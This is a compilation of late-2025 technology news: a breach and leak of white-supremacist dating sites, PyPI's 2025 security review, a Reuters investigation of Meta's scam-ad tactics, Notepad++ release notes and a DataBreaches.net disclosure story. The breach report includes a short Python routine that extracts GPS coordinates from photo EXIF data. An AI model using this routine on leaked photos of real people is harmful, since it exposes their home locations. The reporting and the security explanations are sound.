cybernews.com
Ernestas Naprys
Senior Journalist
Published: 2 January 2026
An investigative journalist has infiltrated the white supremacist dating website WhiteDate and exfiltrated over 8,000 profiles and 100GB of data. Photos and other sensitive details have been made public, and the full “WhiteLeaks” data is available to journalists and researchers on DDoSecrets.
An “old-school anarchist researcher,” who goes by the online pseudonym Martha Root, claims to have breached a racist dating site and two similar platforms.
The leak affects WhiteDate, a white supremacist dating site for “Europids seeking tribal love,” WhiteChild, a white supremacist site focused on family and ancestry, and WhiteDeal, a networking and professional development site for people with a racist worldview.
All three platforms were operated by a right-wing extremist from Germany.
“I infiltrated a racist dating site and made nazis fall in love with robots,” Root claims.
The journalist found that the websites’ cybersecurity hygiene was so poor it “would make even your grandma’s AOL account blush.”
“Imagine calling yourselves the ‘master race’ but forgetting to secure your own website – maybe try mastering to host WordPress before world domination.”
What data was exposed?
The researcher created a website, okstupid.lol, where the 8,000 leaked profiles are plotted on a map, exposing users across many regions of the world.
The data includes highly sensitive and detailed self-reported information, such as usernames, gender, age, location, activity history, lifestyle, height, eye color, hair color, and other physical appearance traits, income range, education, marital status, religion, and even self-assessed IQ, among many other fields.
Notably, the dataset also contains numerous profile photos, along with embedded EXIF metadata that reveals precise GPS coordinates, device information, timestamps, and other identifying details.
The researcher claims that image metadata “practically hands out home addresses.”
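Reading GPS coordinates out of a photo’s EXIF block takes only a few lines of code, which is why geotagged profile photos are so dangerous. As an illustration only (this is not the researcher’s actual tooling, and the sample coordinates are hypothetical), a Python sketch using the third-party Pillow library:

```python
def dms_to_decimal(dms, ref):
    """Convert an EXIF (degrees, minutes, seconds) triple to decimal degrees."""
    degrees, minutes, seconds = (float(v) for v in dms)
    value = degrees + minutes / 60 + seconds / 3600
    # Southern and western hemispheres are negative
    return -value if ref in ("S", "W") else value

def extract_gps(path):
    """Return (lat, lon) from a photo's EXIF data, or None if absent.

    Requires the third-party Pillow library (pip install Pillow).
    """
    from PIL import Image
    with Image.open(path) as img:
        gps = img.getexif().get_ifd(0x8825)  # 0x8825 is the GPS IFD
    if not gps:
        return None
    # EXIF tag IDs: 1/2 = latitude ref/value, 3/4 = longitude ref/value
    lat = dms_to_decimal(gps[2], gps[1])
    lon = dms_to_decimal(gps[4], gps[3])
    return lat, lon
```

A photo geotagged at 48° 51′ 29.6″ N converts to roughly 48.8582 decimal degrees, precise enough to identify a street address.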
“Would like to find a woman who understands the value of nation and race, seeks the truth,” one of the exposed profiles reads.
Root claims that the platform’s gender ratio “makes the Smurf village look like a feminist utopia” – the site is overwhelmingly male.
“For now,” the emails and private messages haven’t been publicly exposed. However, the dataset, dubbed “WhiteLeaks,” has been made available to researchers and journalists on Distributed Denial of Secrets (DDoSecrets), a nonprofit whistleblower site.
The researcher also disclosed that the entire operation was run by a Paris-based company called Horn & Partners, and they identified the woman behind the company.
Investigative journalists and Root presented the data and findings at the 39th Chaos Communication Congress in Germany.
“Martha is whatever the antifascist movement needs at the moment: a ghost in their servers, a thorn in their mythologies, and an intelligence that refuses obedience,” the researcher’s bio on the site reads.
blog.pypi.org
Dustin Ingram, on behalf of the PyPI team.
A look back at the major changes to PyPI in 2025 and related statistics.
As 2025 comes to a close, it's time to look back at another busy year for the Python Package Index. This year, we've focused on delivering critical security enhancements, rolling out powerful new features for organizations, improving the overall user experience for the millions of developers who rely on PyPI every day, and responding to a number of security incidents with transparency.
But first, let's look at some numbers that illustrate the sheer scale of PyPI in 2025:
More than 3.9 million new files published
More than 130,000 new projects created
1.92 exabytes of total data transferred
2.56 trillion total requests served
81,000 requests per second on average
These numbers are a testament to the continued growth and vibrancy of the Python community.
Let's dive into some of the key improvements we've made to PyPI this year.
Security First, Security Always
Security is our top priority, and in 2025 we've shipped a number of features to make PyPI more secure than ever.
Enhanced Two-Factor Authentication (2FA) for Phishing Resistance
We've made significant improvements to our 2FA implementation, starting with email verification for TOTP-based logins. This adds an extra layer of security to your account by requiring you to confirm your login from a trusted device when using a phishable 2FA method like TOTP.
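For context on why TOTP is considered phishable: a TOTP code (RFC 6238) is derived purely from a shared secret and the clock, so anyone who tricks a user into typing the current code can relay it within the time window. A minimal stdlib sketch of the derivation (not PyPI's implementation):

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, step=30, digits=6):
    """Compute an RFC 6238 TOTP code (SHA-1) from a base32 secret."""
    key = base64.b32decode(secret_b32, casefold=True)
    # The moving factor is just the number of elapsed 30-second steps
    counter = int((time.time() if for_time is None else for_time) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation per RFC 4226: offset from the digest's last nibble
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

Against the RFC 6238 test secret (`"12345678901234567890"` in base32), the code at T=59 seconds is `287082`, matching the published test vectors.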
Since rolling out these changes, we've seen:
more than 52% of active users with non-phishable 2FA enabled
more than 45,000 total unique verified logins
Trusted Publishing and Attestations
Trusted publishing continues to be a cornerstone of our security strategy. This year, we've expanded support to include GitLab Self-Managed instances, allowing maintainers to automate their release process without needing to manage long-lived API tokens. We've also introduced support for custom OIDC issuers for organizations, giving companies more control over their publishing pipelines.
Adoption of trusted publishing has been fantastic:
more than 50,000 projects are now using trusted publishing
more than 20% of all file uploads to PyPI in the last year were done via trusted publishers
We've also been hard at work on attestations, a security feature that allows publishers to make verifiable claims about their software. We've added support for attestations from all Trusted Publishing providers, and we're excited to see how the community uses this feature to improve the security of the software supply chain.
17% of all uploads to PyPI in the last year included an attestation.
Proactive Security Measures
Beyond user-facing features, we've also implemented a number of proactive security measures to protect the registry from attack. These include:
Phishing Protection: To combat the ongoing threat of phishing attacks, PyPI now detects and warns users about untrusted domains.
Improved ZIP file security: We've hardened our upload pipeline to prevent a class of attacks involving malicious ZIP files.
Typosquatting detection: PyPI now automatically detects and flags potential typosquatting attempts during project creation.
Domain Resurrection Prevention: We now periodically check for expired domains to prevent domain resurrection attacks.
Spam Prevention: We've taken action against spam campaigns, including prohibiting registrations from specific domains that were a source of abuse.
Transparency and Incident Response
This year, we've also focused on providing transparent and timely information about security incidents affecting PyPI. We've published detailed incident reports on a number of events, including:
An issue with privileges persisting in organization teams.
A widespread phishing attack targeting PyPI users.
A token exfiltration campaign via GitHub Actions workflows.
The potential implications of the "Shai-Hulud" attack on the npm ecosystem.
We believe that transparency is key to building and maintaining trust with our community, and we'll continue to provide these reports as needed.
Safety and Support Requests
This year, our safety & support team and administrators have been working diligently to address user requests and combat malware to maintain a healthy ecosystem. We're proud to report significant progress in handling various types of support inquiries and improving our malware response.
Malware Response
We've continued to improve our malware detection and response capabilities. This year, we've processed more than 2,000 malware reports. This is a testament to the vigilance of our community and the dedication of our administrators.
Our goal is to reduce the time it takes to remove malware from PyPI, and we're happy to report that we're making significant progress: in the last year, 66% of all reports were handled within 4 hours, climbing to 92% within 24 hours, with only a few more complex issues reaching the maximum of 4 days to remediate.
Support Requests
Our support team has also been hard at work making sure our users can continue to be effective on PyPI. This year, we've successfully resolved 2,221 individual account recovery requests.
We've also handled more than 500 project name retention requests (PEP 541), with an average first-triage time of less than 1 week. This is a significant improvement compared to the previous 9-month backlog, and we're happy to report that the backlog is current for the month of December.
Organizations Growth
One of our biggest announcements in previous years was the general availability of organizations on PyPI. Organizations provide a way for companies and community projects to manage their packages, teams, and billing in a centralized location.
We have continued to see growing usage of organizations:
7,742 organizations have been created on PyPI
9,059 projects are now managed by organizations
We've been hard at work adding new features to organizations, including team management, project transfers, and a comprehensive admin interface. We're excited to see organizations use these features to work more effectively on PyPI.
A Better PyPI for Everyone
Finally, we've made a number of improvements to the overall maintainer experience on PyPI. These include:
Project Lifecycle Management: You can now archive your projects to signal that they are no longer actively maintained. This is part of a larger effort to standardize project status markers as proposed in PEP 792.
New Terms of Service: We've introduced a new Terms of Service to formalize our policies and enable new features like organizations.
Looking Ahead to 2026
We're proud of the progress we've made in 2025, but we know there's always more to do. In 2026, we'll continue to focus on improving the security, stability, and usability of PyPI for the entire Python community.
Acknowledgements
As always, a huge thanks to our sponsors who make the scale and reliability of PyPI possible, and a special shout-out to Fastly for being a critical infrastructure donor.
We'd also like to extend a special thank you to a few individuals who made significant contributions to PyPI this year. Thank you to William Woodruff, Facundo Tuesca, and Seth Michael Larson for your work on trusted publishing, attestations, project archival, zipfile mitigation, and other security features.
Finally, PyPI wouldn't be what it is today without the countless hours of work from our community. A huge thank you to everyone who contributed code, opened an issue, or provided feedback this year. As always, we're grateful for the contributions of our community, whether it's through code, documentation, or feedback. PyPI wouldn't be what it is today without you.
Here's to a great 2026!
Reuters reuters.com
By Jeff Horwitz
December 31, 2025, 2:00 PM GMT+1
A Reuters investigation examines Meta’s tactics, including efforts to make scam ads “not findable” when authorities search for them.
As regulators press Meta to crack down on rogue advertisers on Facebook and Instagram, the social media giant has drafted a “playbook” to stall them. Internal documents seen by Reuters reveal its tactics, including efforts to make scam ads “not findable” when authorities search for them.
SAN FRANCISCO - Japanese regulators last year were upset by a flood of ads for obvious scams on Facebook and Instagram. The scams ranged from fraudulent investment schemes to fake celebrity product endorsements created by artificial intelligence.
Meta, owner of the two social media platforms, feared Japan would soon force it to verify the identity of all its advertisers, internal documents reviewed by Reuters show. The step would likely reduce fraud but also cost the company revenue.
To head off that threat, Meta launched an enforcement blitz to reduce the volume of offending ads. But it also sought to make problematic ads less “discoverable” for Japanese regulators, the documents show.
The documents are part of an internal cache of materials from the past four years in which Meta employees assessed the fast-growing level of fraudulent advertising across its platforms worldwide. Drawn from multiple sources and authored by employees in departments including finance, legal, public policy and safety, the documents also reveal ways that Meta, to protect billions of dollars in ad revenue, has resisted efforts by governments to crack down.
In this case, Meta’s remedy hinged on its “Ad Library,” a publicly searchable database where users can look up Facebook and Instagram ads using keywords. Meta built the library as a transparency tool, and the company realized Japanese regulators were searching it as a “simple test” of “Meta’s effectiveness at tackling scams,” one document noted.
To perform better on that test, Meta staffers found a way to manage what they called the “prevalence perception” of scam ads returned by Ad Library searches, the documents show. First, they identified the top keywords and celebrity names that Japanese Ad Library users employed to find the fraud ads. Then they ran identical searches repeatedly, deleting ads that appeared fraudulent from the library and Meta’s platforms.
Instead of telling me an accurate story about ads on Meta’s platforms, it now just tells me a story about Meta trying to give itself a good grade for regulators.
Sandeep Abraham, former Meta fraud investigator
The tactic successfully removed some fraudulent advertising of the sort that regulators would want to weed out. But it also served to make the search results that Meta believed regulators were viewing appear cleaner than they otherwise would have. The scrubbing, Meta teams explained in documents regarding their efforts to reduce scam discoverability, sought to make problematic content “not findable” for “regulators, investigators and journalists.”
Within a few months, they said in one memo after the effort, “we discovered less than 100 ads in the last week, hitting 0 for the last 4 days of the sprint.” The Japanese government also took note, the document added, citing an interview in which a prominent legislator lauded the improvement.
Meta has studied searches of its Ad Library and worked to reduce the "discoverability" of problematic advertising. Documents reviewed by Reuters, and highlighted here by the news agency, show internal discussions about the effort. REUTERS
“Fraudulent ads are already decreasing,” Takayuki Kobayashi, of the ruling Liberal Democratic Party, told a local media outlet. Kobayashi didn’t respond to a Reuters request for comment about the interview.
Japan didn’t mandate the verification and transparency rules Meta feared. The country’s Ministry of Internal Affairs and Communications declined to comment.
So successful was the search-result cleanup that Meta, the documents show, added the tactic to a “general global playbook” it has deployed against regulatory scrutiny in other markets, including the United States, Europe, India, Australia, Brazil and Thailand. The playbook, as it’s referred to in some of the documents, lays out Meta’s strategy to stall regulators and put off advertiser verification unless new laws leave them no choice.
The search scrubbing, said Sandeep Abraham, a former Meta fraud investigator who now co-runs a cybersecurity consultancy called Risky Business Solutions, amounts to “regulatory theater,” distorting the very transparency the Ad Library purports to provide. “Instead of telling me an accurate story about ads on Meta’s platforms, it now just tells me a story about Meta trying to give itself a good grade for regulators,” said Abraham, who left the company in 2023.
Meta spokesperson Andy Stone in a statement told Reuters there is nothing misleading about removing scam ads from the library. “To suggest otherwise is disingenuous,” Stone said.
By cleaning those ads from search results, the company is also removing them from its systems overall. “Meta teams regularly check the Ad Library to identify scam ads because when fewer scam ads show up there that means there are fewer scam ads on the platform,” Stone wrote.
Advertiser verification, he said, is only one among many measures the company uses to prevent scams. Verification is “not a silver bullet,” Stone wrote, adding that it “works best in concert with other, higher-impact tools.” He disputed that Meta has sought to stall or weaken regulations, and said that the company’s work with regulators is just part of its broader efforts to reduce scams.
Those efforts, Stone continued, have been successful, particularly considering the continuous maneuvers by scammers to get around measures to block them. “The job of chasing them down never ends,” he wrote. The company has set global scam reduction targets, Stone said, and in the past year has seen a 50% decline in user reports of scams. “We set a global baseline and aggressive targets to drive down scam activity in countries where it was greatest, all of which has led to an overall reduction in scams on platform.”
Meta’s internal documents cast new light on the central role played by fraudulent advertising in the social media giant’s business model – and the steps the company takes to safeguard that revenue. Reuters reported in November that scam ads Meta considers “high risk” generate as much as $7 billion in revenue for the company each year. This month, the news agency found that Meta tolerates rampant fraud from advertisers in China.
In response to Reuters’ coverage, two U.S. senators urged regulators at the Securities and Exchange Commission and the Federal Trade Commission to investigate and “pursue vigorous enforcement action where appropriate.” Citing Reuters reporting, the attorney general of the U.S. Virgin Islands also sued Meta this month for allegedly “knowingly and intentionally” exposing users of its platforms to “fraud and harm” and “profiting from scams.” Stone said Meta strongly disagrees with the lawsuit’s allegations.
In Brussels, where European authorities have also been focused on scams, a spokesperson for the European Commission told Reuters its regulators had recently asked Meta for details about its handling of fraudulent advertising. “The Commission has sent a formal request for information to Meta relating to scam ads and risks related to scam ads and how Meta manages these risks,” spokesperson Thomas Regnier wrote. “There are doubts about compliance.” He didn’t elaborate.
The documents reviewed by Reuters show that Meta assigned its handling of scams the top possible score in an internal ranking of regulatory, legal, reputational and financial risks in 2025. One internal analysis calculated that possible regulation in Europe and Britain that would make Meta liable for its users’ scam losses could cost the company as much as $9.3 billion.
EMPLOY A “REACTIVE ONLY” STANCE
One big push among regulators is to get Meta and other social media companies to adopt what is known as universal advertiser verification. The step requires all advertisers to pass an identity check by social media platforms before the platforms will accept their ads. Often, regulators request that some of an advertiser’s identity information also be viewable, allowing users to see whether an ad was posted locally or from the other side of the world.
Google in 2020 announced that it would gradually adopt universal verification, and said earlier this year it has now verified more than 90% of advertisers. Along with requiring verification in jurisdictions where it’s legally mandated, Meta offers to voluntarily verify some large advertisers and sells “Meta Verified” badges to others, combining identity checks with access to customer support staff.
Documents reviewed by Reuters say that 55% of Meta’s advertising revenue came from verified sources last year. Stone, the spokesperson, added that 70% of the company’s revenue now comes from advertisers it considers verified.
The internal company documents show that unverified advertisers are disproportionately responsible for harm on Meta’s platforms. One analysis from 2022 found that 70% of its newly active advertisers were promoting scams, illicit goods or “low quality” products. Stone said that Meta routinely disables such new accounts, “some on the very day that they’re created.”
Meta’s documents also show the company recognizes that universal verification would reduce scam activity. They indicate that Meta could implement the measure in any of the countries where it operates in less than six weeks, should it choose to do so.
But Meta has balked at the cost.
Despite reaping revenue of $164.5 billion last year, almost all of which came from advertising, Meta has decided not to spend the roughly $2 billion it estimates universal verification would cost, the documents show. In addition to that cost of implementation, staffers noted, Meta could ultimately lose up to 4.8% of its total revenue by blocking unverified advertisers.
I expected that the company would have continued to do more verification, and personally felt that was something that all major platforms should be doing.
Rob Leathern, a former senior director of product management at Facebook
Instead of adopting verification, Meta has decided to employ a “reactive only” stance, according to the documents. That means resisting efforts at regulation – through lobbying but also through measures like the scrubbing of Ad Library searches in Japan last year. The reactive stance also means accepting universal verification only if lawmakers mandate it.
So far, just a few markets, including Taiwan and Singapore, have done so.
Even then, the documents show, the financial costs to Meta have remained small. Meta’s own tests showed verification immediately reduced scam ads in those countries by as much as 29%. But much of the lost revenue was recouped because the same blocked ads continued to run in other markets.
If an unverified advertiser is blocked from showing ads in Taiwan, for example, Meta will show those ads more frequently to users elsewhere, creating a whack-a-mole dynamic in which scam ads prohibited in one jurisdiction pop up in another. In the case of blocked ads in Taiwan, “revenue was redistributed/rerouted to the remaining target countries,” one March 2025 document said, adding that consumer injury gets displaced, too. “This would go for harm as well,” the document noted.
Meta analyses found that even when verification blocked ads in one market, those same ads would still generate revenues for the company in other markets. Highlighting of internal document reviewed by Reuters. REUTERS
Meta’s documents show the company believes its efforts to defeat regulation are succeeding. In mid-2024, one strategy document called the prospect of being “required to verify all advertisers” worldwide a “black swan,” a term used to describe an improbable but catastrophic event. In the months afterwards, policy staffers boasted about stalling regulations in Europe, Singapore, Britain and elsewhere.
In July, one Meta lobbyist wrote colleagues after they thwarted stricter measures considered by financial regulators in Hong Kong against financial scams. To get ahead of the effort, staffers helped regulators draft a voluntary “anti-scam charter.” They coordinated with Google, which also signed the charter, to present a “united front,” the document says. “Through skillful negotiations with regulators,” the Meta lobbyist wrote, Hong Kong relaxed rules that would have forced verification of financial advertisers. “The finalised language does not introduce new commitments or require additional product development.”
Hong Kong regulators, the lobbyist added, “have shown huge appreciation for Meta’s leading participation.”
Meta staffers boasted about success slowing the push by authorities for advertiser verification. In one document, highlighted here by Reuters, Meta employees say their lobbying in Hong Kong thwarted "new commitments" in local regulations. REUTERS
A Google spokesperson said the company signed onto the charter because it believed it would benefit customers. Google participated, he said, of its own accord and as the result of direct engagement with Hong Kong regulators.
In a statement, Hong Kong financial regulators said that “advertiser verification is one of many ways social media platforms can protect the investment public.” They declined to respond to Reuters’ questions about Meta and noted that the regulators involved with the charter don't themselves have the authority to impose advertiser verification requirements.
“All social media platforms should strengthen their efforts to detect and remove fraudulent and unlawful materials,” they added.
“INDUSTRY AND REGULATORY EXPECTATIONS”
Fraud across social media platforms has surged in recent years, fueled by the rise of untraceable cryptocurrency payments, AI ad-generation tools and organized crime syndicates. Mob rings have found the business so lucrative that they employ forced labor to staff well-documented “scam compounds” that generate waves of fraudulent content from southeast Asia. Internally, Meta has cited estimates that such compounds are responsible for $63 billion in annual damage to consumers worldwide.
In some countries, regulators have determined that Meta platforms host more fraudulent content than its online competitors. In February 2024, Singapore police reported that more than 90% of social media fraud victims in the city state had been scammed through Facebook or Instagram. In a statement to Reuters, a spokesperson for Singapore’s Ministry of Home Affairs wrote that “Meta products have persistently been the most common platforms used by scammers.”
“We have repeatedly highlighted our deep concern over the continued prevalence of scams on Meta’s platforms,” the statement continued. After Reuters’ inquiries for this report, it added, Singapore authorities have asked Meta for more information and will broaden existing verification measures, including some mandating the use of facial recognition technology to prevent the impersonation of public figures. “We have reiterated that more needs to be done to secure Meta’s products and protect users from scams, instead of prioritising its profits. We have requested for a formal explanation from Meta and will take enforcement action if Meta is found to be in violation of legal requirements.”
A known weakness in Meta’s defenses is the ease of advertising on its platforms.
To purchase most advertisements, all a client needs is a user account – easily created with an email or phone number and a user-supplied name and birthdate. If Meta doesn’t verify those details, it can’t know who it’s doing business with. Even if an advertiser gets banned, there is nothing to stop it from returning with a new account. A fraudster can merely sign up again.
Meta has known about the problem for years, documents and interviews with former staffers show.
In the 2016 U.S. presidential election, fake political ads flooded Facebook with disinformation. In response, the company took steps to reduce chances that could happen again. Back then, foreign actors seeking to influence the election easily placed ads masquerading as Americans. Some Russian advertisers pretending to be American political activists even paid for such ads in rubles, Meta has said.
Starting in 2018, the company began requiring a valid identity document and a confirmed U.S. address before clients could place political ads. In addition to providing verification for the company itself, the general details, including the name and location of the advertiser, could be viewed by users, too.
Rob Leathern, a former senior director of product management at Facebook who oversaw the effort to verify political advertisers, said the added transparency and accountability led some staffers to believe that Meta would broaden it to all advertisers. “I expected that the company would have continued to do more verification, and personally felt that was something that all major platforms should be doing,” said Leathern, who left the company at the end of 2020.
Meta in 2018 also introduced its Ad Library, an easily searchable database of all ads that run on its platforms. The company, the documents show, expected to generate goodwill with the library, particularly with regards to political advertisements. Competitors, including Google, soon launched ad libraries of their own.
In the years that followed, Meta continued to acknowledge the effectiveness of both transparency and verification. So-called “know your customer policies,” Meta staffers wrote in a November 2024 document, are “commonly understood to be effective at reducing scam-risks.” They noted a competitive component, too, citing Google’s move at the start of the decade to adopt universal verification: “Google’s approach to verify all advertisers is recalibrating industry and regulatory expectations.”
Meta, however, has been reluctant to pay for it.
The internal documents show that last year Meta consulted with a company that works with Google to verify advertisers. Meta officials, according to the documents, wanted to know how much it would cost to follow suit. But the answer – at least $20 per advertiser – proved too costly for their liking, one document said.
The Meta spokesperson said that the company, regardless of cost, didn’t work with the vendor because its verification process took too long.
The potential for lost revenue has also given the company pause.
In addition to lost income from advertisers culled by verification, stricter measures could also cannibalize a paid program through which Meta already charges advertisers for similar status. The program, known as “Verified for Business,” costs clients as much as $349.99 per month and allows businesses to display a badge assuring users that Meta has authenticated their profile. Meta describes the program as more than just basic verification, offering advertisers better customer support and protections against impersonation.
Still, the documents show, Meta managers fear those revenues could shrivel if the company adopts verification for all advertisers.
“WE HAVE AN OPPORTUNITY”
In 2023, because of a sharp rise in ads for investment scams, Taiwan passed legislation ordering social media platforms to begin verifying advertisers of financial products. The self-governing island, population 23 million, is small compared to Meta’s major markets, but the company’s response there helps illustrate how resistant Meta has been to growing regulatory scrutiny worldwide.
In private conversations, the documents show, Taiwanese regulators told Meta it needed to demonstrate it was taking concrete steps to help reduce financial scam ads. When it came to financial fraud, the regulators said, Meta needed to verify the identity of those advertising financial services and respond to reports of fraud within 24 hours.
Meta, according to the documents, told Taiwan it needed more time to comply. Regulators agreed. But Meta, the documents show, in the months that followed didn’t address the problem to the government’s satisfaction.
Frustrated, the Taiwanese regulators last year issued new demands. Now, the new regulations stated, Meta and the owners of other major platforms would have to verify all advertisers. Regulators told Meta it would be fined $180,000 for every unverified scam ad it ran, Meta staffers wrote.
If it didn’t comply, the staffers calculated, the resulting fines would exceed Meta’s total profits in Taiwan. It would be cheaper to abandon the market than to disobey, they concluded.
Meta complied, rushing to verify advertisers ahead of regulators’ deadlines.
In a statement to Reuters, Taiwan’s Ministry of Digital Affairs said stricter regulations over the past year brought down rates of scam ads involving investments by 96% and identity impersonation by 94%. In addition to requiring major social media platforms to verify advertisers, Taiwan has developed its own AI system to scan ads on Meta’s platform, set up a portal for citizens to report fraudulent ads, and established public-private partnerships to detect scams, the ministry added.
Over the course of 2025, the statement said, Taiwan has fined Meta about $590,000 for four violations of the law. The ministry said it “will maintain a close watch on shifting fraud risks.”
The new rules gave Meta the opportunity to study the impact that full verification would have on its business. Before the new regulation, according to internal calculations, about 18% of all Meta advertising in Taiwan, or about $342 million of its annual ad business there, broke at least one of the company’s rules against false advertising or the sale of banned products. Unverified advertisers, one analysis found, produced twice as much problematic advertising as those who submitted verification details.
Their analyses also revealed the whack-a-mole dynamic.
Because scamming is a global business – and Meta’s algorithms allow clients to choose multiple markets in which to advertise – many advertisers seeking to place fraudulent posts do so in more than one geography. Meta experiments showed that while fraudulent ads decreased in Taiwan after the rule change, its algorithms simply rerouted them to users in other markets.
“The implication here is that violating actors that only require verification in one country, will shift their harm to other countries,” one analysis spelled out. Unless advertiser verification was “enforced globally,” staffers wrote, Meta wouldn’t so much be fighting scams as relocating them.
The documents included briefing notes prepared for Chief Executive Mark Zuckerberg about the dynamic. Reuters couldn’t determine whether the Meta boss ever saw the notes or was briefed on their contents. But the message delivered a similar conclusion. It also warned of a complication: If enforcement in one jurisdiction worsened the problem of fraud in others, regulators in the newly impacted markets were likely to crack down, too.
Meta spokesperson Stone said he couldn’t determine whether Zuckerberg received the briefing described in the document reviewed by Reuters.
Faced with the prospect of ever-expanding scrutiny, Meta considered embracing full verification voluntarily, the documents show. The goal, staffers wrote, could enable the company to appear proactive but also set terms and a timeline on its own. “We have an opportunity to set a goal of verifying all advertisers (and communicate our intention to do so externally, in order to better negotiate with lawmakers),” a November 2024 strategy document noted. Meta could “stage the rollout over time and set our own definitions of verification.”
Policy staff even planned to announce the decision during the first half of 2025, the documents show. But for reasons not specified in the documents, they postponed an announcement until the second half of the year and then cancelled it altogether. Leadership had changed its mind, a document noted, without saying why.
“MIMIC WHAT REGULATORS MAY SEARCH FOR”
Instead, Meta began to apply some of the lessons it learned in Japan.
That experience helped the company realize that Tokyo wasn’t the only government using Ad Library searches as a means of tracking online fraud. “Regulators will open up the ads library and show us multiple similar scam ads,” public policy staffers lamented in one 2024 document. Staffers also noted authorities were employing one feature that was proving especially useful: a keyword search. Unlike Google’s version, the Meta library made it easy to find scam ads through searches with terms like “free gift” or “guaranteed profit.”
Managers overseeing a revamp of the Ad Library proposed eventually killing the keyword feature entirely, the documents show. Wary of blowback from regulators, however, Meta decided not to. The Meta spokesperson said Meta is not considering it.
The company did, however, change the library so that searches returned fewer objectionable ads.
One adjustment made searches default to active ads, reducing the number of results by excluding content that Meta had already blocked through prior screening. As a result, fraudulent ads from the past no longer appeared in new search results.
Staffers also made Meta’s systems rerun enforcement measures on all ads that appeared during new Ad Library searches, the documents show. That adjustment gave Meta a second chance to scrap violators that had previously evaded fraud filters.
One of the most useful tactics Meta learned in Japan was mimicking the searches performed by regulators. After repeating the same queries and deleting problematic results, staffers could eventually go days without finding scam ads, one document shows.
As a result, Meta decided to take the tactic global, performing similar analyses to assess “scam discoverability” in other countries. “We have built a vast keyword list by country that is meant to mimic what regulators may search for,” one document states. Another described the work as changing the “prevalence perception” of scams on Facebook and Instagram.
Meta’s perception-management tools are now part of what the company has referred to as its “general global playbook” for dealing with regulators. The documents reviewed by Reuters repeatedly reference the “playbook” as steps the company should follow in order to slow the push toward verification in any given jurisdiction.
Beginning one year ahead of expected regulation, the playbook advises, Meta should tell the local regulators it will create a voluntary verification process. When doing so, the documents add, Meta should ask those authorities for time to let the voluntary measures play out. To buy yet more time, and further gauge reactions from regulators, Meta after six months should force verification upon “new and risky” advertisers, the playbook continues.
Meta has devised a “global playbook,” summarized in the document here, to delay and weaken the push by regulators to mandate advertiser verification. Internal documents reviewed by Reuters show that verification reduces scam ads, but also costs Meta revenue. REUTERS
If ultimately regulators force mandatory verification for all, the playbook states, Meta should once again stall. “Keep engaging with regulator on extension,” one document advises.
The documents show Meta staffers celebrating the success of their efforts to change some perceptions.
In March, industry officials and regulators met for a conference in London organized by the Global Anti-Scam Alliance, a group that organizes regular gatherings to address online fraud. Meta staffers in one document celebrated the lack of scorn heaped on the company compared with previous events.
“There was a drastic shift in tone,” a project manager noted. “Meta was rarely called out whereas previously we were explicitly and repeatedly shamed for lack of action in countering fraud.”
Notepad++ notepad-plus-plus.org
2025-12-27
Though the version number is major, this release itself is not a major update; it contains a regression fix and enhancements.
The self-signed certificate is no longer used as of this release. Only the legitimate certificate issued by GlobalSign is now used to sign Notepad++ release binaries. We strongly recommend that users who previously installed the self-signed root certificate remove it.
A log of security errors encountered during Notepad++ updates is now generated automatically. If the auto-update process stops due to a signature or certificate verification failure, users can check the file located at "%LOCALAPPDATA%\Notepad++\log\securityError.log" to identify the issue and report it to the Notepad++ issue tracker.
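As a rough illustration of checking that log before filing a report, here is a hedged sketch: the log's exact format is not documented in the release notes, so the `find_security_errors` helper (a name invented for this example) simply filters lines by keyword.

```python
import os

def find_security_errors(log_path):
    """Return log lines mentioning signature or certificate problems.

    The log layout is an assumption -- we just filter by keyword,
    since the release notes do not document the file's exact format.
    """
    keywords = ("signature", "certificate", "verification")
    hits = []
    with open(log_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            if any(k in line.lower() for k in keywords):
                hits.append(line.rstrip("\n"))
    return hits

if __name__ == "__main__":
    # %LOCALAPPDATA% expands only on Windows; the path is from the release notes.
    path = os.path.expandvars(r"%LOCALAPPDATA%\Notepad++\log\securityError.log")
    if os.path.exists(path):
        for hit in find_security_errors(path):
            print(hit)
```

Anything the filter surfaces can then be pasted directly into an issue-tracker report.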
The jarring dark-mode color regression introduced in v8.8.9 has also been fixed in this release.
In addition to the security enhancements & the regression-fix mentioned above, this release includes various bug-fixes & several additional enhancements. You can view the full list of improvements for version 8.9 and download it here:
databreaches.net
Posted on December 25, 2025 by Dissent
Over the years, DataBreaches has been contacted by many people with requests for help notifying entities of data leaks or breaches. Some of the people who contact this site are cybercriminals, hoping to put pressure on their victims. Others are researchers who are frustrated by their attempts at responsible disclosure.
When it’s a “blackhat” contacting this site, DataBreaches often responds by seeking more information from them, and may even contact their target to ask for confirmation or a statement about claims that are being made. Usually, DataBreaches does not report on the attack or claims at that time, so as not to add to the pressure the entity might be under to pay some extortion. Occasionally, though, depending on the circumstances and the length of time since the alleged breach, this site may report on an attack that an entity has not yet disclosed, especially if personal information is already being leaked.
Some people have questioned whether I have been too friendly with cybercriminals or a mouthpiece for them. Occasionally, I have even been accused of aiding criminals. I’ve certainly knowingly aided some criminals who have contacted me over the years if they are trying to do the right thing or turn their lives around. And I’ve also helped some cybercriminals in ways I cannot reveal here because it involves off-the-record situations. One person recently referred to me as the “threat actor whisperer.”
The reality is that I talk to most cybercriminals as people and chatting with them gives me greater insights into their motivations and thinking. And, of course, it occasionally gives me tips and exclusives relevant to my reporting.
Do some threat actors lie to me? Undoubtedly. I resent being “played” and I get mad at myself if I have been duped.
The remainder of this post is about a data leak on a few forums involving data from WIRED and Condé Nast and how DataBreaches was “played.”
A Message on Signal
On November 22, a message request appeared on Signal from someone called “Lovely.” The avatar was a cute kitten, and the only message was “Hello.”
DataBreaches’ first thought was that this was a likely scammer, but curiosity prevailed, so I accepted the request. What they wrote next surprised me:
Can you try to get me a security contact at Condé Nast? I emailed them about a serious vulnerability on one of their websites a few days ago but I haven’t received a response yet
“Lovely,” who assured me they were not seeking a bug bounty or any payment, said they were simply trying to inform Condé Nast of a vulnerability that could expose account profiles and enable an attacker to change accounts’ passwords. On inquiry, they claimed they had only downloaded a few profiles as proof of the vulnerability.
“Lovely” showed me screenshots of attempts to inform WIRED and Condé Nast via direct contact with one of their security reporters and someone who claimed to be from their security team.
They also showed me my own registration data from WIRED.com, which was accurate, as well as the information of a WIRED reporter, who seemingly confirmed that his data was also correct.
